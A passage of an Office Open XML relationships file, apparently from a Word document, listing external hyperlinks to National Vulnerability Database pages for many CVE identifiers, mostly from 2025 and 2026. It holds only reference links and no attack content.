Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52182" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61478" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61479" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61480" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14296" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14957" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15406" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15667" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16960" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17470" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18058" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18453" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22591" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27462" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27490" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30866" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33630" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37198" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37237" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37736" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38346" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38348" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38349" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38350" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38636" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38638" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46369" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47895" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48486" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52482" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53587" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54788" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55099" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55484" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55525" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55553" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55584" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55620" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55841" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5680" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63421" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63462" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63495" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71360" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71626" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73786" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74761" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75328" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75368" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75371" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75413" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75438" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76098" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76905" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77384" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77438" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77465" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78490" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78543" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79323" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79324" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79390" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79641" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79734" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79738" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79740" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79950" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80123" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80212" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80924" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82393" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82397" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84374" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85124" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85505" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86420" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86421" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86429" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87011" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87431" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87450" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87601" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87608" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87734" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87824" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87853" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53525" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54550" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56135" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71622" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78254" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78492" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78494" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79963" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84366" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86746" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87812" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30819" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49314" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55538" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63404" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78485" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79635" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79692" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79695" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80122" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86754" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87814" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13359" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14989" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17553" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23855" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45019" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53499" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54718" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6431" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73769" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73787" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75927" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79426" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79972" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83593" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84293" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86544" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87021" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-48007" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51014" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54396" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71417" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17627" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21100" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30865" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35445" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38821" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47735" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49249" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49315" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50165" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53532" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53728" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55066" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55520" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55527" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55537" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55540" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55609" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55673" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59184" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59186" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59187" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59189" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59981" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59982" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61915" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66003" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68513" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68515" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75369" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77611" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77847" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79617" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79754" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80183" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 